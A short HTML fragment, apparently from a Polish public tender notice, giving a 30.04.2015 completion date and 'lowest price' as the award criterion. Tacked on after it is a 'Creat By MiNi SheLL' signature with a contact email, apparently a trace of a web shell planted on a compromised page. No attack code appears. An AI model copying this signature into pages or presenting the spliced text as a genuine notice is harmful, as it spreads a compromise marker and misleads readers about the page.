<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com